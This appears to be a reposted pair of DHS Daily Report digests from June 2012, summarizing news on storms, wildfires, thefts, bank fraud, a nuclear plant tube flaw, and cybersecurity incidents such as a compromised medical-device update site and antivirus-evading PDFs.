Wednesday, June 20, 2012

Complete DHS Daily Report for June 20, 2012

Daily Report

Top Stories

• Powerful storms in the Minneapolis and St. Paul area cut power to 72,000 residents, downed trees that damaged vehicles and homes, and closed many roads. The storms also impacted drinking water and a water plant, and closed some businesses. – Minneapolis Star Tribune; Associated Press

2. June 19, Minneapolis Star Tribune; Associated Press – (Minnesota) Storms cause headaches across the Twin Cities. About 72,000 residents lost power in the Minneapolis and St. Paul, Minnesota area, June 19 after violent storms rumbled through the area. The powerful storms also knocked out power to the Burnsville water treatment plant, as well as downed trees that fell on homes and vehicles and blocked many streets in Burnsville, Hastings, and Lakeville. Residents in part of West St. Paul were told not to drink their tap water because electrical outages caused low pressure in part of the system, making it easier for harmful bacteria to enter the system. The Burnsville water plant was operating on an emergency generator, and city officials stressed the water was safe for drinking. Xcel Energy said that by the early afternoon it had cut the number of residents without power to 20,500, but noted that some areas of Washington County could take as long as 2 days to receive restored power. The storms also knocked out power to Battle Creek Waterworks, and as a result the water park was closed June 19. Source:

• Thousands of gallons of mineral oil, which helps cool transformers, was stolen from two substations in South Carolina. A Duke Energy spokesman said the company may bolster security measures as a result. – Spartanburg Herald-Journal

4. June 18, Spartanburg Herald-Journal – (South Carolina) Thieves steal thousands of gallons of mineral oil from Duke Energy in Blacksburg. A Duke Energy spokesman said thousands of gallons of mineral oil, which helps cool transformers, was discovered stolen from two locations in South Carolina’s Cherokee County. In the most recent theft, reported June 14, thousands of gallons of oil were stolen from a transformer in Blacksburg. There was also a spill of several hundred gallons, which required clean-up by a contracted hazardous materials crew. The oil did not pose an environmental threat. A theft was reported June 12 from six transformers from a substation adjacent to a vacant manufacturing plant. A spokesman said someone apparently used a large hose, similar to a fire hose, to siphon the gas, likely into a tanker truck. Duke said costs of damage and clean up are in the thousands. Duke Energy officials are familiar with copper thefts from substations, but mineral oil theft is unusual. The thefts are under investigation by the Cherokee County Sheriff’s Office. “We do have adequate security at our substations,” the Duke spokesman said. “But after this, we will take steps to assess the situation and look at other measures.” Source:

• A federal agency found that scores of first responders at New York City’s John F. Kennedy Airport were not qualified to handle emergencies. –

20. June 18, – (New York; New Jersey) First responders at JFK Airport unqualified to handle emergencies, feds say. A federal agency found scores of first responders at New York City’s John F. Kennedy (JFK) Airport were not qualified to handle emergencies, reported June 18. Federal Aviation Administration (FAA) investigators found the overwhelming majority of the nearly 200 cops at JFK either lacked the proper certification to respond to such emergencies or had seen their certifications expire, sources said. The FAA’s revelation forced the Port Authority of New York and New Jersey to pull the unqualified officers and force the certified personnel to work overtime to cover the gaps, sources said. They said similar issues were found at New York City’s LaGuardia and New Jersey’s Newark International Airport, but they were not as severe as the ones found at JFK. The problem at JFK was discovered around April, when the FAA conducted an annual review to determine if the airport had enough properly trained officers to handle any emergency. A spokesman for the FAA said it “is currently reviewing a discrepancy in training records for aircraft rescue and firefighting training at John F. Kennedy International Airport.” Source:

• New evidence suggests a Web site hosting software updates for life-saving medical equipment may have been redirecting visitors to a site distributing attacks and malware for months before the company became aware of the compromise. – Threatpost

30. June 18, Threatpost – (International) Infections at medical device firm lasted for months. New evidence suggests a Web site hosting software updates for life-saving medical equipment was the victim of a massive SQL injection attack and may have been redirecting visitors to a site distributing attacks and malicious software for months before the company became aware of the compromise, Threatpost reported June 18. The Web site viasyshealthcare(dot)com was infected for more than 2 months — from March 23, 2012 to May 31, 2012 — according to data from the anti-spam Web site Clean MX. The length of the compromise makes it likely that CareFusion’s customers — hospitals and other medical offices — were exposed to Web based attacks when they attempted to download software updates for the firm’s medical devices. Viasyshealthcare(dot)com is a Web property that belongs to health care equipment maker CareFusion and used to distribute software updates for CareFusion’s Alaris-brand infusion pumps and AVEA, AirLife, and LTV series ventilation and respiratory products. The infection on CareFusion’s software update site was detected after an assistant professor at the University of Massachusetts, Amherst, noticed their Web site offering an update was blocked by Google’s Safe Browsing service because it was distributing malicious content. The assistant professor contacted CareFusion, the Department of Homeland Security (DHS), and the Food and Drug Administration. While the exact source of the attack is unknown, an analysis by DHS revealed CareFusion was lax in updating the software used to host viasyshealthcare(dot)com. Some of CareFusion’s Web sites were relying on 6-year-old versions of ASP.NET and Microsoft Internet Information Services version 6.0, released with Windows Server2003. Both platforms have known, critical vulnerabilities and are highly susceptible to compromise if not patched and properly managed. DHS’s Industrial Control System Computer Emergency Response Team is working with CareFusion to address the widespread infection. Source:

• Wind-powered wildfires torched hundreds of acres in, and forced closure of some state parks, closed many roads, and forced the evacuation of a small hospital on the Hawaiian islands of Maui and Hawaii. – Honolulu Star-Advertiser

46. June 19, Honolulu Star-Advertiser – (Hawaii) Homes damaged, hospital evacuated due to brush fires on Maui, Hawaii Island. Wind-powered wildfires torched hundreds of acres in and forced the closure of some state parks, closed many roads, and forced the evacuation of a small hospital on the Hawaiian islands of Maui and Hawaii, June 18. On Maui, residents in Kula were evacuated, said a Maui Fire Department fire services chief. Meanwhile, firefighters from the State Department of Forest and Wildlife battled a separate fire in the Makawao State Forest Reserve above the Kahakapao reservoir near Olinda. About 4 acres were burned, said a State Department of Land and Natural Resources spokeswoman. State officials closed the Kula State Forest Reserve, including Polipolii Spring State Park, due to high winds and danger caused by falling trees and branches. About 10 individuals camping at the park or other parts of Haleakala National Park were evacuated. In Hawaii County, more than 50 firefighters were battling fires on two fronts totaling an estimated 650 acres in Pahala, on the southern end of the island, an assistant fire chief said. Mamalahoa Highway was shut down for 7 hours. Firefighters were more concerned about a fire that burned near a community hospital, which was evacuated to the Naalehu Community Center. Source:


Banking and Finance Sector

13. June 19, BankInfoSecurity – (California) Settlement reached in ACH fraud case. A lingering legal dispute over a corporate account takeover incident at an escrow company in Redondo Beach, California finally came to a close, BankInfoSecurity reported June 19. Village View Escrow Inc., which in March 2010 lost nearly $400,000 after its online bank account with Professional Business Bank was taken over by hackers, reached a settlement with the bank for an undisclosed amount, according to Village View’s owner and president. As a result of the settlement, Village View recovered more than the full amount of the funds that had been fraudulently taken from the account, plus interest, the company said in a statement. More details about the settlement were expected to be issued in coming weeks. Source:

14. June 19, IDG News Service – (International) Fake Android antivirus app likely linked to Zeus banking Trojan, researchers say. A recently discovered fake Android security application is most likely a mobile component of the Zeus banking malware, security researchers from antivirus firm Kaspersky Lab said June 18. Called Android Security Suite Premium, the rogue app is capable of stealing SMS messages and uploading them to a remote server. When launched, the app displays a shield image that long associated with Windows fake antivirus programs. However, this might not be a mobile scareware app, but a new variant of ZitMo — Zeus in the Mobile, a Kaspersky Lab senior malware analyst said. Their purpose is to steal mobile transaction authorization numbers (mTANs) sent by banks to customers via SMS messages. Without mTANs, fraudsters would not be able to authorize transactions initiated with stolen credentials. The registration information for the domain names where Android Security Suite Premium uploads stolen SMS messages matches the registration information for 2011 Zeus command-and-control domains. This, coupled with the app’s SMS-stealing functionality makes it likely that this is a new ZitMo version. Source:

15. June 18, Federal Bureau of Investigation – (Texas; Alabama) Three Houston men charged in $68M bank fraud. The FBI announced June 18 the indictment of three Houston-area men on federal conspiracy, wire fraud, and bank fraud charges, and a guilty plea by another man for an information charging conspiracy to make a false statement to a bank. Two of the men were senior figures at H and H Worldwide Financial Service Inc., while another was an attorney in the Houston area, and the final member a stockbroker employed by Tri-Star Financial Services. In February 2005, the H and H director began soliciting loans from the Federal Land Bank of South Alabama. He falsely claimed he had a large bond portfolio that could serve as collateral for the loans and submitted documents that concealed his plan to use about half the loan proceeds to purchase the bonds that were going to serve as collateral. The stockbroker provided documents to the bank to support the bond ownership claim. The bank made two loans to H and H totaling $68.5 million. H and H used more than half the money to buy the bonds that were to serve as collateral. A significant amount of the loan proceeds were used for the personal benefits of the conspirators. Source:

16. June 18, IDG News Service – (International) Data in possible credit card breach appears to be old. A batch of names, addresses, e-mails, and phone numbers of credit card customers around the world released June 18 indicated a breach of a payment processor, but the data appeared old, IDG News Service reported. A hacker nicknamed “Reckz0r” posted a link to the data dump on Pastebin, and wrote on Twitter he had “penetrated over 79 large banks” and holds 50GB of data on MasterCard and Visa cardholders. No card numbers were released, however. Attempts to reach some of the U.S. cardholders affected were unsuccessful, since many of the phone numbers were disconnected or incorrect. But another person on the list in Australia said the information was very old. The home address published for him is 7 years out of date, and an e-mail address published at least 4 years old, the man said in a phone interview. The majority of the data appeared to come from U.S. cardholders, although other people listed purportedly live in countries including Egypt, Cambodia, Israel, Turkey, Pakistan, and elsewhere. The data includes only five digits of the credit card numbers and no expiration dates or three-digit security codes. The mix of international addresses indicates the target could have been an international payment processor, according to the head of CloudeyeZ, a security consultancy. Source:

17. June 18, Legal Times – (International) Feds: Millions of dollars intentionally damaged in criminal scheme. The U.S. Secret Service seized more than $4.24 million in currency that investigators believe was part of a money laundering scheme to acquire new bills in exchange for damaged dollars, the Legal Times reported June 18. Federal investigators said in a search warrant affidavit that more than a dozen packages of money submitted in a 2-year span since 2010 contained bills intentionally damaged through burning and chemical agents. Most of the money came from a bank in Argentina that agents did not identify in court papers unsealed the week of June 11 in U.S. District Court for the District of Columbia. The damaged cash was transmitted to the U.S. Treasury Department’s Bureau of Engraving and Printing, which runs a money replacement program. A Secret Service agent said in an affidavit the currency scheme was an attempt to use the printing bureau’s redemption system as a “money laundering machine.” Investigators said they found two fragments of a single bill in two separate packages, indicating the person wanted to receive, from the federal government, two new bills from one $100 bill. The fragments were identified through the serial number. Some of the bills appeared as if they were damaged by chemical means to make them appear older and more worn than they actually were. Source:

Information Technology Sector

36. June 19, H Security – (International) Joomla 2.5.5 security updates arrives with added features. Joomla! developers released version 2.5.5 of the open source content management system. The new version includes two security updates and fixes several bugs. Joomla! 2.5.5 allows users to copy templates under a new name and modify them later on. A new plugin for user profiles allows administrators to show terms of service agreements and require users to sign off on them. Administrators can also restrict which user names are available and how often users can request to reset theirpasswords during a given amount of time. Source:

37. June 18, Infosecurity – (International) Opera plugs six security holes in latest version of web browser. Opera released version 12 of its Web browser, which includes fixes for six security holes as well as the addition of a Do Not Track feature. Opera fixed the following security issues: hidden keyboard navigation that could allow cross-site scripting or code execution; a combination of clicks and key presses that could lead to cross-site scripting or code execution; cross-domain JSON resources that may be exposed as JavaScript variable data; carefully timed reloads, redirects, and navigation that could spoof the address field; pages that could prevent navigation to a target page, spoofing of the address field; and a “moderate severity issue,” details of which will be disclosed at a “later date.” Source:

For more stories, see items 13, 14, and 16, above in the Banking and Finance Sector and 30 above in Top Stories

Communications Sector

38. June 18, WALB 10 Albany – (Georgia) Thieves steal equipment from Christian radio station. Thieves knocked a Christian radio station in Tifton, Georgia, off the air June 18. They broke into the station and stole thousands of dollars worth of equipment from Hook FM, specifically targeting production equipment and leaving other valuable items behind. There was no sign of forced entry. The station spent several hours off air. Police found the Hook FM vehicle about a mile from the station. The thieves used the vehicle to transport the thousands of dollars in production equipment taken from inside, including cameras to special computers. A popular country station was also hit, the sister station WTIF 107.5, which is located in the same building as Hook FM. Shortly after disc-jockeys informed listeners about what happened, a person from Ashburn found some of the equipment behind Ole Times Country Buffett. Employees said it was the only piece of equipment taken that had a Hook FM logo on it. Source:

For another story, see item 14 above in the Banking and Finance Sector

Tuesday, June 19, 2012

Complete DHS Daily Report for June 19, 2012

Daily Report

Top Stories

• Federal regulators determined design flaws appear to be the cause of excessive wear in tubing that carries radioactive water, a problem that has kept the San Onofre nuclear power plant in San Diego County idled since January. – Associated Press

5. June 18, Associated Press – (California) Feds: Design flaws at Calif. nuke plant behind leak. After months of investigation, federal regulators determined design flaws appear to be the cause of excessive wear in tubing that carries radioactive water through the San Onofre nuclear power plant in San Diego County, California, the Associated Press reported June 18. The twin-reactor plant has been idle since January, after a tube break in one of four steam generators released traces of radiation. A team of federal investigators was dispatched in March after the discovery that some tubes were so badly corroded they could fail. Flaws in fabrication or installation were considered as possible sources of the rapid decay but “it looks primarily we are pointed toward the design” of the heavily modified generators, a Nuclear Regulatory Commission regional administrator told the Associated Press in an interview. “It’s these four steam generators that either have, or are susceptible to, this type of problem,” he said, referring to the unusual damage caused when alloy tubes vibrate and rattle against each other or brackets that hold them in place. Source:

• Michigan’s unusually warm March followed by overnight freezes in April devastated many of the State’s largest fruit farms. The climate caused what some federal officials called the worst weather damage to fruit in the State in the past 50 years. – Detroit Free Press

17. June 17, Detroit Free Press – (Michigan) Volatile climate tough on Michigan’s fruit crops. Michigan’s unusually warm March followed by overnight freezes in April devastated many of the State’s largest fruit farms, the Detroit Free Press reported June 17. The U.S. Department of Agriculture’s (USDA) Michigan field office described the impact as the “worst weather damage to fruit in the state in the past half-century.” The State, which produced 70.9 percent of the nation’s tart cherries in 2010, is expected to harvest a mere 2 million pounds of tarts in 2012, down from 135 million pounds in 2010 and 266 million pounds in 2009, according to the Michigan Frozen Food Packers Association. Other crops damaged by this spring’s volatile climate include apples, peaches, juice grapes — and even maple syrup. “It’s going to be pretty tough financially on these producers, and it’s going to be pretty difficult on the handlers,” said a Michigan Farm Bureau commodities specialist. It is also going to drive prices up — especially for cherries. One buyer said he expects wholesale prices to quadruple. Sales of fruit crops totaled $325.2 million in 2010, according to a report by the USDA and Michigan State University. Source:

• Police shot and killed a gunman to end a standoff at Scott & White Hospital in Temple, Texas, after he took several hospital staffers hostage in the emergency room common area June 17. – Associated Press

26. June 18, Associated Press – (Texas) Police kill gunman in standoff at Temple hospital. Police shot and killed a gunman to end a standoff at Scott & White Hospital in Temple, Texas, after he took several hospital staffers hostage in the emergency room common area June 17. Authorities were trying to determine what sparked the standoff. Police started negotiations when a hostage tried to grab the suspect’s gun. A Temple officer fatally shot the man to end the struggle. Source:

• More residents evacuated June 18 as fire crews faced powerful winds fueling wildfires that have burned hundreds of square miles. The fires have destroyed hundreds of homes and other structures in at least six States. – Associated Press

44. June 18, Associated Press – (National) More evacuations as winds fuel Colorado wildfire. More residents evacuated June 18 as fire crews face another day of powerful winds fueling a wildfire that has charred more than 87 square miles of forested mountains in northern Colorado. Fire officials said crews were able to maintain most existing fire lines, with the fire chewing through about 1,000 more acres June 17. About 1,750 personnel were working on the fire, which was sparked by lightning and was 45 percent contained. The fire destroyed at least 181 homes, the most in State history. Also June 17, a fire erupted in the foothills west of Colorado Springs, prompting the evacuation of an unknown number of homes as well as some cabins, a Boy Scout camp, and a recreation area near the Elevenmile Canyon Reservoir, which provides water to the Denver area. The fire has spread to 450 acres and fire managers said it has the potential to grow much more in the dry, windy conditions. In southwest Colorado, a fire near Pagosa Springs grew to 11,617 acres and was 30 percent contained. It was sparked by lightning May 13. June 17, deputies arrested a Denver man on charges including theft and impersonating a firefighter. In California, a wildfire that forced the evacuation of 150 homes in San Diego County surged to 800 acres June 18 and was 5 percent contained. In Nevada, crews fought a 22,000-acre fire north of Ely, that burned a mobile home. In New Mexico, a wildfire destroyed 242 homes and businesses, and firefighters were working to increase containment and keeping an eye out for possible lightning. The roughly 60-square-mile Little Bear Fire in Ruidoso was 60 percent contained. In Arizona, firefighters were focusing on protecting electrical transmission lines near a 3,100-acre fire on the Tonto National Forest. The fire was 15 percent contained. Source:


Banking and Finance Sector

9. June 18, SecurityWeek – (International) Automatic transfer system evades security measures, automates bank fraud. Trend Micro June 18 released a new report that identifies an Automatic Transfer System (ATS) that enables cybercriminals to circumvent many bank security measures and drain victims’ bank accounts without leaving visible signs of malicious activity. In the new whitepaper, “Automatic Transfer System, a New Cybercrime Tool”, Trend Micro examines the automatic transfer systems within two well-known crime kits, Zeus and SpyEye. Automatic transfer systems are added to the various crime kits as part of the Webinject files. They arm criminals with the ability to move funds from a victim’s account without them being aware. In short, while the victim is performing one type of action, the ATS is transferring money. “Various active ATSs currently found in the wild are being used by cybercriminals to conduct automated online financial fraud,” the whitepaper explains. “These versions use a common framework. Their base code does not change from one version to another. New functionality has been introduced in more recent versions, however, in order to address new security measures”. Source:

10. June 15, U.S. Department of Justice – (National; International) Three tax return preparers charged with helping clients evade taxes by hiding millions in secret accounts at two Israeli banks. Three men were indicted by a federal grand jury in California and charged with conspiring to defraud the United States, the U.S. Department of Justice and Internal Revenue Service (IRS) said June 15. The men were principals and employees of United Revenue Service Inc. (URS), a tax preparation business with 12 offices throughout the United States. The indictment alleges the co-conspirators prepared false individual income tax returns that did not disclose the clients’ foreign financial accounts nor report the income earned from those accounts. To conceal the clients’ ownership and control of assets and conceal their income from the IRS, the co-conspirators incorporated offshore companies in Belize and elsewhere and helped clients open secret bank accounts at the Luxembourg locations of two Israeli banks. Additionally, the co-conspirators incorporated offshore companies in Belize and elsewhere to act as named account holders on the secret accounts at the Israeli banks. They then facilitated the transfer of client funds to the secret accounts and prepared and filed tax returns that falsely reported the money sent offshore as a false investment loss or a false business expense. Source:

11. June 15, Associated Press – (Florida; Georgia; Tennessee) Regulators close 3 banks in 3 States, bringing to 31 the number of US bank failures this year. Federal regulators seized three banks, one each in Florida, Georgia, and Tennessee, bringing the number to 31 of U.S. banks that have failed so far in 2012, the Associated Press reported June 15. The Federal Deposit Insurance Corporation (FDIC) said it closed Putnam State Bank in Palatka, Florida, Security Exchange Bank, in Marietta, Georgia, and The Farmers Bank of Lynchburg, in Lynchburg, Tennessee. The FDIC lined up other lenders to assume the deposits and assets of each of the banks. Regulators estimated that the failure of the three banks will cost the insurance fund $100 million. Source:

12. June 15, KXAS 5 Dallas-Fort Worth – (Texas) Skimming devices stumped Secret Service agent. A Secret Service agent who is an expert on gas pump skimmers said June 15 in court that he had never seen anything like the devices in a Tarrant County, Texas case. A man who is accused of stealing thousands of credit and debit card account numbers across north Texas is on trial in Tarrant County on felony identity charges. A Secret Service agent called the devices the man is accused of installing unique and sophisticated. He said it took him several weeks to figure out how to extract information from them. The devices came from gas pumps. A couple of the skimmers came from the man’s hotel room and his truck. Source:

Information Technology Sector

31. June 18, H Security – (International) Encoding malicious PDFs avoids detection. A security researcher discovered attackers can thwart detection by most common anti-virus software if they encode malicious PDF files in the XDP format. XDP is an XML-based file format that includes the PDF as a Base64-encoded data stream. XDP files are opened by Adobe Reader just like a normal PDF would be and can therefore infect systems in the same way. The researcher’s test document, which uses a 2-year-old security vulnerability in Adobe Reader, was only detected by one anti-virus package in his tests. After experimenting with the XDP format, he was able to create another file that fooled all 42 anti-virus engines used on VirusTotal. The exploit the researcher used has long since been patched. To make sure their networks are not attacked, users should avoid XDP files in general until Adobe patches its software or the anti-virus companies fix their detection methods, experts said. Source:

32. June 18, ZDNet – (International) Attack code published for ‘critical’ IE flaw; Patch your browser now. The week of June 11, when Microsoft released a critical Internet Explorer update, the company issued a warning that working exploit code could be released within 30 days. Less than a week later, an exploit for one of the “critical” browser flaws was fitted into the freely available Metasploit point-and-click attack tool, and samples were released to Contagio, a blog that tracks live malware attacks. The addition of the exploit into Metasploit indicates cyber-criminals now have access to copy the attack code for use in exploit kit and other mass malware attacks. Source:

33. June 15, The Register – (International) ICANN eggfaced after publishing dot-word biz overlords’ personal info. After revealing the details of almost 2,000 new generic top-level domain (gTLD) applications, the Internet Corporation for Assigned Names and Numbers (ICANN) took all the applications offline June 15 after applicants complained their home addresses were published by mistake. ICANN published the partial text of 1,930 gTLD bids during an event in London June 13. Only 30 of the 50 questions in each application were supposed to be revealed; details about financial performance, technical security, and personal contact information were supposed to be redacted. Also, ICANN accidentally published the full contact information of each bid’s primary and secondary contact — including in many cases their home addresses. These named individuals were in several confirmed cases as well as the senior officers and directors of the company applying. The Applicant Guidebook, the authoritative publication for the ICANN new gTLD process, specifically stated home addresses would not be published. Source:

For more stories, see items 9 and 12 above in the Banking and Finance Sector and 34 below in the Communications Sector

Communications Sector

34. June 18, ZDNet – (International) Amazon explains latest cloud outage: Blame the power. June 14, cloud provider Amazon suffered an outage to its Amazon Web Services in a north Virginia datacenter. Many popular Web sites, including Quora, Hipchat, and Heroku — a division of Salesforce — were knocked offline for hours during the evening. Dropbox also was affected by the outage. Several days later, Amazon explained the cause of the fault — which hit its Elastic Compute Cloud (EC2) service — was a power failure. Source:

35. June 17, Charleston Gazette – (West Virginia) Phone service outage reported in East Bank. More than 1,600 Frontier Communications customers in the East Bank area of Kanawha County in West Virginia were without phone service June 17, according to Metro 9-1-1’s Web site. Frontier employees were working to fix the problem. Source: